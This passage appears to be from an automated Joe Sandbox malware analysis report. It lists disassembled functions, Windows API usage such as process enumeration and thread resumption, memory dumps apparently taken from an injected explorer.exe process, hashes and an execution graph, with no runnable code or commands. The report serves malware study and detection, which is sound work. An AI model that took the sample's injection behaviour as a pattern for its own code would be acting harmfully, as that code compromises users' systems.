                                                                                                                                                                                                                        Function 0E0A0BD1 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0E0A0BEE
                                                                                                                                                                                                                          • Part of subcall function 0E0A7C45: _FindPESection.LIBCMT ref: 0E0A7C6E
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 0E0A0BFF
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 0E0A0C12
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0E0A0C5B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction ID: b859286b9f6baf110a25ac12a4327cf5da43d520a915e7638260cd768fa7127f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16118631110A0E8FE769EBB4ECA86E633D1FB54380F4889399507C3064EF789D45CB81
                                                                                                                                                                                                                        Function 0DFA2E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction ID: 44ae286bc0b77f0989d151692f6e6c4de424ec39e46e9d34320c43e19ea8a8c5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1211516231868591DA20EB2DE8503FAB361F7C97A4F859225DB9D47A98DF28CA05CB10
                                                                                                                                                                                                                        Function 0E102E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction ID: 09f27b67f5ad4552904337e1afac4699bb311dbcbe40dbba914c4ee1c883113f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F711933231868481DE20EB21E8543AEB3B1F7C8794FC45A21DA9D47A98DF7CCA85CB40
                                                                                                                                                                                                                        Function 0FF42E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction ID: 3ee03e3ab18bdec518feb08eaa2cb2b4e4cc2bbdb7c726f237011a938917b6b4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6292ced5fc8fb6cbff2989b81b0c0e320a3a7aff2854efd7012699e070fef41a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6611512221878591DB20EB25E8503AAB361FBC9B98FC44225DB9D47699EF2CD605CB10
                                                                                                                                                                                                                        Function 0DFA4BDC Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction ID: 70ae09647e5d53509edf61e957aad26a37b04e81d483e8cdbee1e078438a1632
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32017CA172459282EB808B6BF54072A6361E784FC8F499027DF1D87B58DF69C9908B00
                                                                                                                                                                                                                        Function 0E104BDC Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction ID: dd19bcb5865610bb279f6c5c04cb88147d8ab615d3f558fd843f6ac7fbf59c3f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0014F7172459182EB90CB27F58075E63A0E788FC4F495416DF2D57B8CDF79CA918B04
                                                                                                                                                                                                                        Function 0FF44BDC Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction ID: d34c4e72bfa765051a57ee13e0ef8d3660f9dbc2e50cfc6e7c018a066782815c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: faafbe2c773ac034d002f38037683ccc066242102995be2ac65bfc4a5519ccb7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E017C6172468282EB90CB27F54072EA760EB84FC4F485026DF189BB49DF2DD5958B00
                                                                                                                                                                                                                        Function 0E108B30 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction ID: af7ad4f5f70b74026db62b8d6cccabb1b27c434e51a3615d0da43ec78f6b08ad
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49018136616B8482EB48DF26E8A035D7361F788FD0F188425DA5A13754CF38C592C700
                                                                                                                                                                                                                        Function 0FF48B30 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction ID: d5afd2326a24029f0b7c2689920833ca06cde26b49d9d0d783fabce0087a4ea1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5016235615B41C6DB549F26E4943297761FF48BD4F088035DA1A03F25CF38E052C700
                                                                                                                                                                                                                        Function 0DEF04F9 Relevance: 6.0, APIs: 4, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_error_mode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1949149715-0
                                                                                                                                                                                                                        • Opcode ID: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction ID: e2752378e221ab88e5952cb37410dce8704dae7d62b6d7a8432515f1b2e24925
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EED05E30A4520786FB3832A95A3133830469B42108FC2383CC701952C2DC98C4828322
                                                                                                                                                                                                                        Function 082404F9 Relevance: 6.0, APIs: 4, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_error_mode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1949149715-0
                                                                                                                                                                                                                        • Opcode ID: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction ID: f119a7990e79073126d5e2c80f7f6f8382019ce49f56a9246b0253426d4d2ea2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0D01728961A1B86EABC33A559317382046FB46106F80383C8615893C1DD5884C38232
                                                                                                                                                                                                                        Function 0E0A04F9 Relevance: 6.0, APIs: 4, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_error_mode
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1949149715-0
                                                                                                                                                                                                                        • Opcode ID: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction ID: 476ca8ac3e5794ba78b851244969811a227d331b223de1982fcf4a1869825407
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c616bfab508bed64a1febd0c5b614f793cf0f01a8e10b96cd8bf596b9e95c4fb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88D05E3099120F82FA7832F599713BA20C59B86385FCC4C3DC7018B2C4DC098C828723
                                                                                                                                                                                                                        Function 0DFBB3D0 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction ID: 7f1ecc748ba9ebab870b95430186598c5b7fc2f1ddd124084a959bd0311212d9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7011A32610946E2EB449F95E8903B833B0FB98B89F459033CA1B86674DE78C2D9C764
                                                                                                                                                                                                                        Function 0E11B3D0 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction ID: 72e62fd792546965fe805ddb63528c3fb9cecc661ebfdd8da67cc4acc5faf4a8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7015AB27209C5D2EB089F16E9A03D833B0F798B48F451822DB5A567A4DF38C1DAC745
                                                                                                                                                                                                                        Function 0FF5B3D0 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3605230531-0
                                                                                                                                                                                                                        • Opcode ID: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction ID: 3c65e4f88820ad74df980463a4c97917ef266156f1b66fe8b8968a1a79c5690c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9066380f0e11acb0d8481a5e36b6e97500f83d5bbc2aa0bf40af4e108287c0ab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30010832610D47D2EB649F15E8907B833A0FF98BC8F851032CA1A86A64DF38C1DBD744

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:8.3%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:38
                                                                                                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                                                                                                        execution_graph 29784 274d300 DuplicateHandle 29785 274d396 29784->29785 29786 2744668 29787 2744684 29786->29787 29788 2744696 29787->29788 29790 27447a0 29787->29790 29791 27447a4 29790->29791 29795 27448b0 29791->29795 29799 27448a1 29791->29799 29796 27448d7 29795->29796 29798 27449b4 29796->29798 29803 2744248 29796->29803 29801 27448a4 29799->29801 29800 27449b4 29800->29800 29801->29800 29802 2744248 CreateActCtxA 29801->29802 29802->29800 29804 2745940 CreateActCtxA 29803->29804 29806 2745a03 29804->29806 29807 274ad38 29811 274ae30 29807->29811 29816 274ae20 29807->29816 29808 274ad47 29812 274ae64 29811->29812 29813 274ae41 29811->29813 29812->29808 29813->29812 29814 274b068 GetModuleHandleW 29813->29814 29815 274b095 29814->29815 29815->29808 29818 274ae24 29816->29818 29817 274ae64 29817->29808 29818->29817 29819 274b068 GetModuleHandleW 29818->29819 29820 274b095 29819->29820 29820->29808 29821 274d0b8 29822 274d0fe GetCurrentProcess 29821->29822 29824 274d150 GetCurrentThread 29822->29824 29825 274d149 29822->29825 29826 274d186 29824->29826 29827 274d18d GetCurrentProcess 29824->29827 29825->29824 29826->29827 29830 274d1c3 29827->29830 29828 274d1eb GetCurrentThreadId 29829 274d21c 29828->29829 29830->29828

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 053DC708 Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 486 53dc708-53dc727 487 53dc72d-53dc768 486->487 488 53dcd02-53dcd11 486->488 506 53dc76a-53dc77b 487->506 507 53dc783-53dc78c 487->507 489 53dcd1c-53dcd6c 488->489 490 53dcd13-53dcd19 488->490 499 53dcd6e-53dcd74 489->499 500 53dcd7a-53dcd87 489->500 490->489 499->500 501 53dce27-53dce30 499->501 502 53dcdf1-53dcdff 500->502 503 53dce3a-53dce9d 501->503 504 53dce32-53dce38 501->504 513 53dcd89-53dcda5 502->513 514 53dce01-53dce07 502->514 561 53dcea4-53dcead 503->561 504->503 506->507 511 53dc78e-53dc798 507->511 512 53dc7a0-53dc7a7 507->512 511->512 518 53dc7a9-53dc7df 512->518 519 53dc7e7-53dc800 512->519 542 53dcda7-53dcdb0 513->542 543 53dcdb2-53dcdb8 513->543 515 53dce0d-53dce17 514->515 516 53dcf48-53dcf51 514->516 520 53dce1d-53dce24 515->520 521 53dcfc5-53dcfce 515->521 522 53dcf5b-53dcfbe 516->522 523 53dcf53-53dcf59 516->523 518->519 534 53dc806-53dc80f 519->534 535 53dc883-53dc8ea 519->535 528 53dcfd8-53dcffd 521->528 529 53dcfd0-53dcfd6 521->529 522->521 523->522 573 53dd003-53dd054 528->573 529->528 539 53dc811-53dc81b 534->539 540 53dc823-53dc82a 534->540 600 53dc8ec-53dc8f6 535->600 601 53dc8fe-53dc905 535->601 539->540 545 53dc82c-53dc862 540->545 546 53dc86a-53dc880 540->546 542->543 558 53dcdd5-53dcdde 542->558 547 53dcdcc-53dcdd3 543->547 548 53dcdba-53dcdbe 543->548 545->546 546->535 555 53dcdf0 547->555 548->547 553 53dcdc0-53dcdc6 548->553 553->547 553->561 555->502 574 53dcde9 558->574 575 53dcde0-53dcde7 558->575 566 53dceaf-53dceb5 561->566 567 53dceb7-53dcecf 561->567 566->567 582 53dcee1-53dcf41 567->582 583 53dced1-53dced9 567->583 607 53dd056 573->607 574->555 575->555 582->516 583->582 600->601 602 53dc945-53dc952 601->602 603 53dc907-53dc93d 601->603 611 53dc958-53dc961 602->611 612 53dca53-53dca5c 602->612 603->602 613 53dc975-53dc97c 611->613 614 53dc963-53dc96d 611->614 616 53dca5e-53dca68 612->616 617 53dca70-53dca77 612->617 621 53dc9bc-53dc9e2 613->621 622 53dc97e-53dc9b4 613->622 614->613 616->617 619 53dca79-53dcaaf 617->619 620 53dcab7-53dcad6 617->620 619->620 636 53dcadc-53dcae5 620->636 637 53dccf8-53dccff 620->637 645 53dc9e4-53dc9ee 621->645 646 53dc9f6-53dc9fd 621->646 622->621 638 53dcafc-53dcb03 636->638 639 53dcae7-53dcaf4 636->639 643 53dcb05-53dcb3b 638->643 644 53dcb43-53dcb50 638->644 639->638 643->644 655 53dcc54-53dcc9d call 53d5680 call 53d5990 644->655 656 53dcb56-53dcb5f 644->656 645->646 649 53dca3d-53dca4b 646->649 650 53dc9ff-53dca35 646->650 649->612 650->649 655->637 694 53dcc9f-53dcccb call 53d5990 655->694 659 53dcb76-53dcb7d 656->659 660 53dcb61-53dcb6e 656->660 663 53dcbbd-53dcbe3 659->663 664 53dcb7f-53dcbb5 659->664 660->659 681 53dcbe5-53dcbef 663->681 682 53dcbf7-53dcbfe 663->682 664->663 681->682 685 53dcc3e-53dcc4c 682->685 686 53dcc00-53dcc36 682->686 685->655 686->685 694->637 702 53dcccd-53dcce8 call 53d5990 694->702 706 53dccf0 702->706 706->637
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 006a790dc2046addbe184d71849090f78f45c9c8b40e27241c10f89a86e17654
